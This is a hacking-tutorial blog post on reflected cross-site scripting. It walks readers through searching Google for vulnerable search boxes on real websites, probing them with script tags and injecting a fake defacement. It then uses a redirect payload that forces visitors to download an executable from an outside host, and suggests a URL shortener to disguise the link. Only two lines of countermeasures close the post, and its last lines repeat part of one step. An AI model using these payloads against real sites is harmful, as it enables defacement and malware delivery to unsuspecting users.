Basic Hacking via Cross Site Scripting (XSS) – The Logic
Bookmark
Posted by v4L in Hacking Tutorial | 2 comments

Type : Tutorial

Level : Medium

Target : Cross Site Scripting (XSS) Vulnerable website

According to wikipedia.org Cross Site Scripting (XSS) is :

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications, such as web browsers through breaches of browser security, that enables attackers to inject client-side script into Web pages viewed by other users.

So let say that Cross Site Scripting (XSS) was a hacking method that allow attacker inject some script to web server that can affect other users that accessing that webpage.

Actually there's 2 types of Cross Site Scripting (XSS) : Non-Persistent and Persistent (you can read it more at wikipedia), but in this tutorial we will learn about the non-persistent one.

One of my computer security class student 3 years ago ask me about "what will I got if I successfully found a vulnerable XSS website?", I simply can answer "it's depend"; yes it is depend on how the server handle your request and how they take care the malicious data you provide to the server, but the non-persistent one is great enough to spread a malicious file to many internet users.

Let's start the tutorial…
Requirements :

1. Found a Cross Site Scripting (XSS) vulnerable website, or

2. You can download the simple PHP file I have already create below (download link)
Mediafire.com

Step by Step :

1. You can use the PHP file I already put on mediafire.com for you test it on your own lab(use XAMPP), but for this tutorial I will use from real website on the wild internet (do not worry, the logic was the same, once you understand it you'll got the point)

2. Use Google to search for vulnerable website :

Basic Hacking via Cross Site Scripting (XSS) - The Logic

Pencarian was Indonesian language equal to searching, you can modify the Google parameter for search the much more specific website even in your own language.

3. To find a vulnerable website, you need to do a trial and error. I'm testing more than 5 website to test for their search feature is it vulnerable or not for XSS.

Basic Hacking via Cross Site Scripting (XSS) - The Logic

The simple method to test was using <h1> and <script>alert('x');</script> tag like example picture above.

4. If the website was vulnerable, you will find something like this.

Basic Hacking via Cross Site Scripting (XSS) - The Logic
Description :

1. I test other website and input the code <h1>TEST</h1> or <script>alert('x');</script> on search box.

2. The result was show a heading title, but I'm not sure, then

3. I check the selection source to make sure it's not a bold :-p

4. Oops..my query was purely processed by server without filtering :-)

5. Now we got the vulnerable website what to do next?? Did you know that with Cross Site Scripting (XSS) you also can do a defacing to a website by injecting some code in it?(not really deface/fake)

Basic Hacking via Cross Site Scripting (XSS) - The Logic


Description :

I put this script on search box to display the fake website deface.

<script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>THIS SITE WAS HACKED</h1></div>";</script>

6. This Cross Site Scripting (XSS) Vulnerability also you can use to steal a session cookie, I will write the tutorial later :-)

7. Now after we can do deface, show a heading tag, and alerting using javascript what next?

Let say I have a fake exe program that containing a malicious program and I host it on another website and I want some user download it. In this tutorial I will use putty.exe as a malicious program that can be downloaded from http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe. BTW putty was not a malicious program…in this case I only use it for testing purpose to make sure the attack was work.

Basic Hacking via Cross Site Scripting (XSS) - The Logic
Description :

On the search box I put the script :
<script>document.location="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe";</script>

so the URL was like this : http://www.vulnerable-website.com/search?keyword=%3Cscript%3Edocument.location%3D%22http%3A%2F%2Fthe.earth.li%2F%7Esgtatham%2Fputty%2Flatest%2Fx86%2Fputty.exe%22%3B%3C%2Fscript%3E\

8. It's too long :-P so maybe some service that can make URL more short will be useful to make the link like this :

http://goo.gl/T5tPh

9. From the step 7 and 8 can you imagine how if the attacker was use the real malicious file to harm user computer? or maybe the attacker combine it with backtrack metasploit like my other tutorial (view here)? only you who can answer it :-)

If you still not clear for the tutorial above, you can view the video below:

http://www.hacking-tutorial.com/pics/blog/xss-basic/xss-3.jpghttp://www.hacking-tutorial.com/pics/blog/xss-basic/xss-3.jpg


Countermeasures/Prevention :

1. For developer : always filter user input and prevent some special characters being processed before filter it first.

2. For user : If you find unusual or strange environment from website you visited, it's better to leave it out.

Hope it's useful :-)
- See more at: http://www.hacking-tutorial.com/hacking-tutorial/basic-hacking-via-cross-site-scripting-xss-the-logic/#sthash.yaTaLtLU.dpuf

: http://www.vulnerable-website.com/search?keyword=%3Cscript%3Edocument.location=%22http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe%22;%3C/script%3E\
8. It's too long so maybe some service that can make URL more short will be useful to make the link like this :
http://goo.gl/T5tPh
- See more at: http://www.hacking-tutorial.com/hacking-tutorial/basic-hacking-via-cross-site-scripting-xss-the-logic/#sthash.yaTaLtLU.dpuf